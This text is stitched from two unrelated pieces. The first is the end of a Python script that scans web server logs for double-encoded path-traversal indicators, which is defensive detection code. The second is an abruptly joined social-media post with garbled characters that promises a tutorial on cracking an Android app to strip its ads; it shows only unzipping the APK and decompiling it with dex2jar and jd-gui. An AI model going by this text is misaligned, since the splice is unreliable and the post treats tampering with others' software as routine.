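    """Split a query string WITHOUT decoding, so double encoding survives."""
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, value


def scan_log(lines):
    """One finding per request parameter that carries at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, value in raw_params(query):
            hits = indicators(value)
            if hits:
                findings.append({"ip": m.group("ip"), "status": m.group("status"),
                                 "param": name, "value": unquote(unquote(value)),
                                 "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG.splitlines()):
        print(f["ip"], f["status"], f["param"], f["indicators"])
```

Decoding twice before matching is what makes the %252e line show up; a single decode would leave it looking like a harmless percent-encoded string.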

@UndercodeTesting

🦑 Android app cracked to block advertising, complete tutorial, full, by UnderCode:
instagram.com/UnderCodeTestingCompany

πŸ¦‘ π•ƒπ”Όπ•‹π•Š π•Šπ•‹π”Έβ„π•‹ :

1) WHAT EXACTLY WE WANT:

> Power consumption, data consumption, screen space, flickering and eye-catching, accidental touches: this advertising method is intolerable for people with obsessive-compulsive tendencies, and I believe most people are disgusted by it too, so it is almost never seen in commonly used apps. From a learning perspective, I tried to hack this application and "block" the advertising function.

2) Unzip
Download the apk file, change the suffix to .zip, and extract it to a folder.

3) Inside it:

> assets folder - holds native asset files

> lib folder - holds referenced library files

> META-INF folder - holds the manifest files

> res folder - holds resource files

> AndroidManifest.xml - the Android manifest

> resources.arsc - the main resources file

> The above are mainly related to resources. If you need to extract some pictures or sound resources, you can find them directly in those folders. The remaining classes.dex file is more important: it is the packaged format for the classes in an Android app.

4) View the jar
To view the code, you need to convert the dex file into a jar file. A recommended tool for this is "Android Reverse Assistant".

5) It integrates apktool, autosign, dex2jar, jd-gui and other common tools, which is very convenient.
Here, select the dex2jar function, browse to the extracted classes.dex file, and click the operate button to automatically generate the classes_dex2jar.jar file.
Then select the "jd open jar" function to call jd-gui and view the jar file.